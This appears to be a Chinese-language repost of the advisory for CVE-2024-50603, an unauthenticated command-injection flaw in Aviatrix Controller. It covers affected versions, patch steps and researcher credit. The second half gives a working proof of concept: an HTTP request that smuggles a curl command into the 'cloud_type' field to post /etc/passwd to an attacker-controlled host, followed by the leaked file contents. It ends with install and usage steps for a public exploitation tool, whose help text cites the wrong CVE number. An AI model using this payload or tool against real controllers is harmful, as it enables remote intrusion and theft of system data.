目录导航
CVE-2024-50603
Aviatrix 控制器中的远程代码执行漏洞。
在Aviatrix Controller 7.x 至 7.2.4820中发现一个问题。由于对 OS 命令中使用的特殊元素的无效化不当,
未经身份验证的攻击者能够远程执行任意代码。
CVE 编号
风险评级
Aviatrix 控制器 CVSS 9.9(严重)AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
漏洞描述
漏洞可能允许未经身份验证的用户针对 Aviatrix 控制器执行任意命令。Aviatrix 已发现有迹象表明不良行为者正在试图利用此漏洞,并强烈建议您采取措施保护您的控制器。
影响
成功的攻击将允许未经身份验证的用户在控制器上执行任意命令。
受影响的产品
7.2.4996 或 7.1.4191 之前所有受支持的 Aviatrix Controller 版本。
解决方案
安装安全补丁CVE-2024-50603 – 严重漏洞安全补丁或将控制器更新至 7.1.4191 或 7.2.4996。此外,Aviatrix 建议遵循控制器 IP 访问指南并确保控制器没有将端口 443 暴露给互联网。
要应用补丁,请按照应用安全补丁的标准程序进行操作。
在某些情况下,修补程序在控制器升级后不会完全持久,即使控制器状态显示为“已修补”,也必须重新应用。这些情况包括:该补丁首次应用于 7.1.4191 或 7.2.4996 之前的版本。控制器随后更新到 7.1.4191 或 7.2.4996 之前的版本。控制器没有运行 4.16.1 或更高版本的关联 CoPilot。 |
致谢
Aviatrix 感谢 SecuRing 的 Jakub Korepta 负责任地披露此漏洞。他的技术文章可在https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/找到。
Aviatrix 简介
Aviatrix 使企业组织能够提供专用基础设施,以支持业务关键型应用程序并加速云计划。Aviatrix 网络平台将业界领先的软件定义网络与精心编排的原生服务相结合,统一了云,提供简化的操作、优化的云成本、改进的安全性和高级网络。Aviatrix 云网络平台将云足迹与最佳实践架构框架保持一致,同时通过基础设施即代码加速部署。
CVE-2024-50603 poc
我运行 curl 将 /etc/passwd 的内容发送到我的服务器:
POST /v1/api HTTP/1.1
Host: 10.55.55.55
Content-Length: 177
Content-Type: application/x-www-form-urlencoded
action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+"@/etc/passwd"+https://address.controlled.by.the.attacker)
然后我收到了服务器的回调,其中包含/etc/passwd文件的内容:
POST / HTTP/1.1
Host: address.controlled.by.the.attacker
User-Agent: curl/7.58.0
Accept: */*
Content-Length: 1971
Content-Type: application/x-www-form-urlencoded
Expect: 100-continue
root:x:0:0:root:/root:/bin/bash
(...)
azureuser:x:1001:1003:Ubuntu:/home/azureuser:/bin/bash
assetd-service-user:x:1002:1004::/home/assetd-service-user:/bin/sh
volume-scanner-orchestrator:x:113:65534::/home/volume-scanner-orchestrator:/usr/sbin/nologin
etcd:x:114:119::/var/lib/etcd/:/usr/sbin/nologin
漏洞利用工具

安装
git clone https://github.com/th3gokul/CVE-2024-50603.git cd CVE-2024-50603 pip install -r requirements.txt python3 cvehunter.py --help@RevoltSecurities
使用
python3 cvehunter.py -h
▄████▄ ██▒ █▓▓█████ ██░ ██ █ ██ ███▄ █ ▄▄▄█████▓▓█████ ██▀███
▒██▀ ▀█▓██░ █▒▓█ ▀ ▓██░ ██▒ ██ ▓██▒ ██ ▀█ █ ▓ ██▒ ▓▒▓█ ▀ ▓██ ▒ ██▒
▒▓█ ▄▓██ █▒░▒███ ▒██▀▀██░▓██ ▒██░▓██ ▀█ ██▒▒ ▓██░ ▒░▒███ ▓██ ░▄█ ▒
▒▓▓▄ ▄██▒▒██ █░░▒▓█ ▄ ░▓█ ░██ ▓▓█ ░██░▓██▒ ▐▌██▒░ ▓██▓ ░ ▒▓█ ▄ ▒██▀▀█▄
▒ ▓███▀ ░ ▒▀█░ ░▒████▒░▓█▒░██▓▒▒█████▓ ▒██░ ▓██░ ▒██▒ ░ ░▒████▒░██▓ ▒██▒
░ ░▒ ▒ ░ ░ ▐░ ░░ ▒░ ░ ▒ ░░▒░▒░▒▓▒ ▒ ▒ ░ ▒░ ▒ ▒ ▒ ░░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░ ▒ ░ ░░ ░ ░ ░ ▒ ░▒░ ░░░▒░ ░ ░ ░ ░░ ░ ▒░ ░ ░ ░ ░ ░▒ ░ ▒░
░ ░░ ░ ░ ░░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
CVE-2024-50603 @th3gokul & @th3sanjai
[描述]:用于检测和利用 CVE-2024-34102 漏洞的工具
选项:
-h, --help 显示此帮助信息并退出
-u URL, --url URL [信息]: 指定一个用于漏洞检测的 URL 或域名
-l LIST, --list LIST [信息]: 指定一个用于漏洞检测的 URL 列表
-t THREADS, --threads THREADS [信息]: 设置用于处理 URL 列表的线程数
-proxy PROXY, --proxy PROXY [信息]: 使用指定的代理 URL 发送请求
-v, --verbose [信息]: 增加控制台输出的详细程度
-o OUTPUT, --output OUTPUT [信息]: 指定保存漏洞目标输出的文件名
https://github.com/th3gokul/CVE-2024-50603
CVEHunter 工具是针对 CVE-2024-34102 的利用工具,该工具的开发者是
我们特别感谢bebik和他的SSRF工具,它帮助我们研究和利用 CVE-2024-50603,让我们知道回调、ping 并在利用此漏洞时找到准确的结果,我们感谢他为开源社区做出的巨大贡献。
转载请注明出处及链接